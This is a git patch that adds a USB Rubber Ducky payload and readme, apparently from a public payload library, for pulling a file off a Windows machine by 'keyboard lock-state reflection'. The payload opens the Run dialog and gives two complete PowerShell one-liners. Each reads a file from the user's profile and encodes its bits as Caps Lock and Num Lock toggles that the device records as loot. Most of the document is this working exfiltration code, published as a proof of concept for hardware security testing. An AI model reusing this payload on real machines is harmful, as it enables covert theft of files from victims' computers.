From a1cb86a9aa6e9ec9281962f02acfae4876057c39 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Thu, 18 Aug 2022 12:17:24 +0100 Subject: [PATCH] Image of Key --- .../Win_Hid_ImgOverKey/payload.txt | 41 +++++++++++++++++++ .../exfiltration/Win_Hid_ImgOverKey/readme.md | 22 ++++++++++ 2 files changed, 63 insertions(+) create mode 100644 payloads/library/exfiltration/Win_Hid_ImgOverKey/payload.txt create mode 100644 payloads/library/exfiltration/Win_Hid_ImgOverKey/readme.md diff --git a/payloads/library/exfiltration/Win_Hid_ImgOverKey/payload.txt b/payloads/library/exfiltration/Win_Hid_ImgOverKey/payload.txt new file mode 100644 index 0000000..ba8c6fa --- /dev/null +++ b/payloads/library/exfiltration/Win_Hid_ImgOverKey/payload.txt @@ -0,0 +1,41 @@ +DELAY 3000 +REM Title: Image over key reflection +REM Author: Cribbit +REM Description: Proof of concept for send an image over key reflection using two methods +REM Target: Windows 10 +REM Props: Korban, Darren, I-Am-Jakoby + +REM Config: You will need to change the path to an image at the moment it points to C:\Users\{Current user}\test.jpg + +REM Note: this will take forever a 807 bytes file took about 7 mins. + +ATTACKMODE HID +LED OFF +DELAY 2000 +SAVE_HOST_KEYBOARD_LOCK_STATE +$_EXFIL_MODE_ENABLED = TRUE +$_EXFIL_LEDS_ENABLED = TRUE + +GUI r +DELAY 200 + +REM The "string method" is fast to encode than the check each bit but is 20 char longer. +REM This reads the image by bytes converts each byte to a binary string. Pads the string to 8 zero. then replaces the 1 and 0's with the lock keys +REM UN-REM THE LINE BELOW TO USES +REM STRINGLN powershell "gc $env:USERPROFILE\test.jpg -En By|%{$k+=([convert]::ToString($_,2).PadLeft(8,'0')-replace'0','%{CAPSLOCK}'-replace'1','%{NUMLOCK}')};$k+='%{SCROLLLOCK}';Add-Type -A *m.W*s.F*s;[System.Windows.Forms.SendKeys]::SendWait($k)" + +REM This bit version it is slightly short then the example payload for hak5. +REM By replacing the all hex value that it uses to check each bit agaist each byte. +REM Too piping 7 down to 0 the left shifing 1 by this value i.e. 1 -shl 7 = (bin 10000000, hex 80 dec 128) to 1 -shl 0 = (bin 00000001, hex 1 dec 1) +REM UN-REM THE LINE BELOW TO USES +REM STRINGLN powershell "gc $env:USERPROFILE\test.jpg -En By|%{$b=$_;7..0|%{if($b-band(1-shl$_)){$k+='%{NUMLOCK}'}else{$k+='%{CAPSLOCK}'}}};$k+='%{SCROLLLOCK}';Add-Type -A *m.W*s.F*s;[System.Windows.Forms.SendKeys]::SendWait($k)" + + +WAIT_FOR_SCROLL_CHANGE +LED_G +$_EXFIL_MODE_ENABLED = FALSE +RESTORE_HOST_KEYBOARD_LOCK_STATE + +ATTACKMODE STORAGE + +REM When storage shows rename the loot.bin extension to the file extension in this case .jpg to view the file. \ No newline at end of file diff --git a/payloads/library/exfiltration/Win_Hid_ImgOverKey/readme.md b/payloads/library/exfiltration/Win_Hid_ImgOverKey/readme.md new file mode 100644 index 0000000..9b1b4d1 --- /dev/null +++ b/payloads/library/exfiltration/Win_Hid_ImgOverKey/readme.md @@ -0,0 +1,22 @@ +# Image over key reflection +- Author: Cribbit +- Version: 1.0 +- Target: Windows (Powershell 5.1+) +- Category: exfiltration +- Attackmode: HID then Storage + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Proof of concept for send an image over key reflection using two methods of converting bytes to key presses. + +## Config +Un-REM the method to try. And place and image at the C:\Users\{Current user}\test.jpg. +The smaller image the better a file of 807 bytes took about 7 mins. + +## Props +To Darren and Korban for all the hard work they have put in to new ducky & key reflection. And for answer my questions i had about the duck before i had it. +To I am Jakoby for shorting the System.Windows.Forms bit \ No newline at end of file